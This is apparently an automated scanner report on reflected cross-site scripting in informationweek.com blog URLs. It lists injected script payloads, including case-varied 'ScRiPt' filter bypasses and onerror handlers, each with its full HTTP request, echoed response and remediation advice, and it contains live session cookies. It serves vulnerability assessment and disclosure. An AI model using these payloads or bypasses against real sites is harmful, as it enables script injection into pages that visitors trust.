GET /7c38a</script>6a9657b6156/main/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:11 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:11 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31301
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//7c38a</script>6a9657b6156/main/archives/microso;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=170017236;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f522e"><script>alert(1)</script>65cd5d997e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /f522e"><script>alert(1)</script>65cd5d997e/main/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31369
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//f522e"><script>alert(1)</script>65cd5d997e/main;kvarticleid=;kvauthor=;loc=300;grp=823668502" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea91d"><script>alert(1)</script>3491c520b46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/ea91d"><script>alert(1)</script>3491c520b46/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64663
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5a15</script><a%20b%3dc>6d62dbe71bd was submitted in the REST URL parameter 3. This input was echoed as e5a15</script><a b=c>6d62dbe71bd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archivese5a15</script><a%20b%3dc>6d62dbe71bd/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63711
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivese5a15</script><a b=c>6d62dbe71bd/microso;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=610646342;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4d4"%20a%3db%20e7c5a9f106a was submitted in the REST URL parameter 3. This input was echoed as cc4d4" a=b e7c5a9f106a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivescc4d4"%20a%3db%20e7c5a9f106a/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63580
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivescc4d4" a=b e7c5a9f106a/microsoft/index;kvarticleid=;kvauthor=;loc=300;grp=61409625" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56ae"><a>786f20881d8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/microsoft/index.htmlf56ae"><a>786f20881d8 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59260
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/microsoft/indexf56ae"><a>786f20881d8;kvarticleid=;kvauthor=;loc=300;grp=429014916" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62402</script><a%20b%3dc>e2298a1ea0c was submitted in the REST URL parameter 5. This input was echoed as 62402</script><a b=c>e2298a1ea0c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/microsoft/index.html62402</script><a%20b%3dc>e2298a1ea0c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59649
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/microsoft/index62402</script><a b=c>e2298a1ea0c;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=976256369;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f3a"><script>alert(1)</script>3f16ea69cb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b4f3a"><script>alert(1)</script>3f16ea69cb8/main/archives/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31365
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//b4f3a"><script>alert(1)</script>3f16ea69cb8/mai;kvarticleid=;kvauthor=;loc=300;grp=419980978" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15444"><a%20b%3dc>fd7ff8d3413 was submitted in the REST URL parameter 3. This input was echoed as 15444"><a b=c>fd7ff8d3413 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives15444"><a%20b%3dc>fd7ff8d3413/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63625
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives15444"><a b=c>fd7ff8d3413/mobile/index;kvarticleid=;kvauthor=;loc=300;grp=302285423" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b9d2'-alert(1)-'5b09b4b8f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives6b9d2'-alert(1)-'5b09b4b8f0d/mobile/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63710
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives6b9d2'-alert(1)-'5b09b4b8f0d/mobile/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=765338386;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e51</ScRiPt%20><script>alert(1)</script>8d36d72825 was submitted in the REST URL parameter 4. This input was echoed as b3e51</ScRiPt ><script>alert(1)</script>8d36d72825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main/archives/b3e51</ScRiPt%20><script>alert(1)</script>8d36d72825/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59346
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/b3e51</ScRiPt ><script>alert(1)</script>8d36d72825;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=570240748;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main/archives/63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59299
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/63013"><ScRiPt>alert(1)</ScRiPt>5e3f90fc601/index;kvarticleid=;kvauthor=;loc=300;grp=352272834" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8607'-alert(1)-'e6ba9ce3ca0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/mobile/index.htmlf8607'-alert(1)-'e6ba9ce3ca0 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59384
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/mobile/indexf8607'-alert(1)-'e6ba9ce3ca0;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=280754808;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30d5"><a>760a25fa775 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/mobile/index.htmld30d5"><a>760a25fa775 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59155
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/mobile/indexd30d5"><a>760a25fa775;kvarticleid=;kvauthor=;loc=300;grp=858994798" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62bd0"><img%20src%3da%20onerror%3dalert(1)>ecb015eff65 was submitted in the REST URL parameter 1. This input was echoed as 62bd0"><img src=a onerror=alert(1)>ecb015eff65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog62bd0"><img%20src%3da%20onerror%3dalert(1)>ecb015eff65/main/archives/wolfes_den/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
